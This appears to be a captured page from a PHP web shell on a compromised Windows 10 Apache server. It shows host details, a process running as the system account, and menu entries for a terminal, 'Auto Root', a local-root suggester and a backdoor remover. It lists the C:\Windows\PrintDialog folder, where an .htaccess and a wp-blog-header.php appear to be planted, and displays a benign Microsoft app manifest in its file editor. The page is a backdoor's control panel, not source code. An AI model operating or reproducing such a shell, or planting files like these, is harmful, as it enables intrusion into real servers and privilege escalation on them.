Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Windows /
PrintDialog /
Delete
Unzip
Name
Size
Permission
Date
Action
Assets
[ DIR ]
dr-xr-xr-x
2019-12-07 10:14
en-US
[ DIR ]
drwxrwxrwx
2019-12-07 15:53
microsoft.system.package.metadata
[ DIR ]
drwxrwxrwx
2022-09-17 00:28
pris
[ DIR ]
dr-xr-xr-x
2022-09-19 01:59
.htaccess
197
B
-r--r--r--
2025-06-02 09:56
PrintDialog.dll
1.67
MB
-rw-rw-rw-
2025-07-09 07:54
PrintDialog.exe
120.15
KB
-rwxrwxrwx
2023-11-16 02:59
SmallLogo.png
741
B
-rw-rw-rw-
2022-09-18 10:14
appxblockmap.xml
319
B
-rw-rw-rw-
2024-04-12 16:47
appxmanifest.xml
2.74
KB
-rw-rw-rw-
2024-04-12 16:47
appxsignature.p7x
9.46
KB
-rw-rw-rw-
2024-04-12 16:47
resources.pri
2.15
KB
-rw-rw-rw-
2022-09-18 10:14
wp-blog-header.php
2.73
KB
-r--r--r--
2025-06-02 09:56
Save
Rename
<?xml version="1.0" encoding="utf-8"?> <Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10" xmlns:uap="http://schemas.microsoft.com/appx/manifest/uap/windows10" xmlns:mp="http://schemas.microsoft.com/appx/2014/phone/manifest" IgnorableNamespaces="uap mp"> <Identity Name="Windows.PrintDialog" Publisher="CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" Version="6.2.1.0" ResourceId="neutral" /> <Properties> <DisplayName>ms-resource:DisplayName</DisplayName> <Description>ms-resource:Description</Description> <Logo>assets\logo.png</Logo> <PublisherDisplayName>ms-resource:PublisherDisplayName</PublisherDisplayName> </Properties> <Dependencies> <TargetDeviceFamily Name="Windows.Universal" MinVersion="10.0.0.0" MaxVersionTested="1000.19041.4239.0" /> </Dependencies> <Resources> <Resource Language="en-us"/> </Resources> <Applications> <Application Id="Microsoft.Windows.PrintDialog" Executable="PrintDialog.exe" EntryPoint="AppObject.EntryPoint"> <uap:VisualElements DisplayName="ms-resource:DisplayName" Description="ms-resource:Description" AppListEntry="none" Square150x150Logo="Logo.png" Square44x44Logo="SmallLogo.png" BackgroundColor="transparent"> <uap:SplashScreen Image="SplashScreen.png" BackgroundColor="#F2F2F2" /> </uap:VisualElements> <Extensions> <Extension Category="windows.backgroundTasks" EntryPoint="PrintBackgroundTask.PrintToastBackgroundTask"> <BackgroundTasks> <Task Type="systemEvent" /> </BackgroundTasks> </Extension> <uap:Extension Category="windows.protocol"> <uap:Protocol Name="ms-print-addprinter"> <uap:Logo>assets\logo.png</uap:Logo> <uap:DisplayName>Add a printer</uap:DisplayName> </uap:Protocol> </uap:Extension> <uap:Extension Category="windows.protocol"> <uap:Protocol Name="ms-print-printjobs"> <uap:Logo>assets\logo.png</uap:Logo> <uap:DisplayName>Print job action center</uap:DisplayName> </uap:Protocol> </uap:Extension> </Extensions> </Application> </Applications> <Capabilities> <uap:Capability Name="sharedUserCertificates"/> </Capabilities> <Extensions> <Extension Category="windows.activatableClass.inProcessServer"> <InProcessServer> <Path>PrintDialog.dll</Path> <ActivatableClass ActivatableClassId="PrintBackgroundTask.PrintToastBackgroundTask" ThreadingModel="both" /> </InProcessServer> </Extension> </Extensions> </Package>